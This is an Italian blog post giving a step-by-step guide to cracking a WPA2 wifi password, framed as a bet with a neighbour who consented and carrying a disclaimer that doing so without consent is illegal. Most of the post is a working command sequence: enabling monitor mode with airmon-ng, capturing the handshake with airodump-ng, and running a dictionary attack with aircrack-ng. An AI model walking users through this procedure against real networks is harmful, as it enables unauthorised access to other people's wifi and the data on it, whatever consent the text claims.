Trovare la password di una rete wifi protetta con WPA2


L’altro giorno per scommessa col mio vicino di casa ho deciso di cimentarmi nel trovare la password della sua rete wifi, che secondo lui era introvabile.

Ricordo: io l’ho fatto per scommessa e col consenso del proprietario, ma introdursi su una rete wifi altrui senza il consenso del proprietario è ILLEGALE; per questo non mi assumo nessuna responsabilità dell’uso che fate di questa guida.

Abbiamo ora due opzioni: scaricare Kali o utilizzare la nostra distro Linux installata (Arch nel mio caso).
Se scegliamo di utilizzare Kali da live, lo scarichiamo dalla pagina del progetto e creiamo una chiavetta avviabile (come ho spiegato su quest’altra guida).
Se invece volete utilizzare la vostra Arch (o altra distro Linux) installate aircrack-ng:
# pacman -S aircrack-ng.

Ora possiamo cominciare:
Nota: se non sappiamo quale nome ha la nostra interfaccia wifi utilizziamo iwconfig per scoprirlo.
Per prima cosa procuriamoci i vari dizionari da qui (che ci serviranno in seguito), oppure potete crearne di vostri, se volete.

Accediamo come ROOT (in questa guida tutti i comandi sono dati da utente root).
ifconfig wlan0 up
se vi capita il seguente errore SIOCSIFFLAGS: Operation not possible due to RF-kill risolvete con
rfkill unblock wifi; sudo rfkill unblock all

iwlist wlan0 scanning
e da questa schermata memorizziamo “Address” e “Channel” ceh serviranno nel comando successivo
airmon-ng start wlan0
airodump-ng wlan0mon --bssid Address --channel Channel --write BreakingWPA2

a questo punto l’interfaccia wifi deve restare in ascolto finchè non trova un WPA handshake valido (quando lo trova comparirà tra parentesi quadre nella prima riga).
A questo punto iniziate l’attacco Brute Force vero e proprio:
aircrack-ng BreakingWPA2-01.cap -w nomedizionario

Ora vi basta armarmi di santa pazienza e lasciare il programma provi a trovare la password della rete Wifi!
Nota: il programma semplicemente prova ad una ad una le chiavi presenti nel dizionario (infatti è un attacco Brute Force), quindi se avete creato il vostro dizionario perché pensate che le password siano composte da determinate parole e numeri, dovrete inserire anche le varie permutazioni, distinzioni e combinazioni di maiuscolo e minuscolo ecc.

Cosa si fa pur di farsi offrire una birra! 😉

Questa voce è stata pubblicata in Arch Linux, Debian, linux e contrassegnata con , , , , , , , , , , , . Contrassegna il permalink.

Rispondi

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo di WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione /  Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione /  Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione /  Modifica )

Connessione a %s...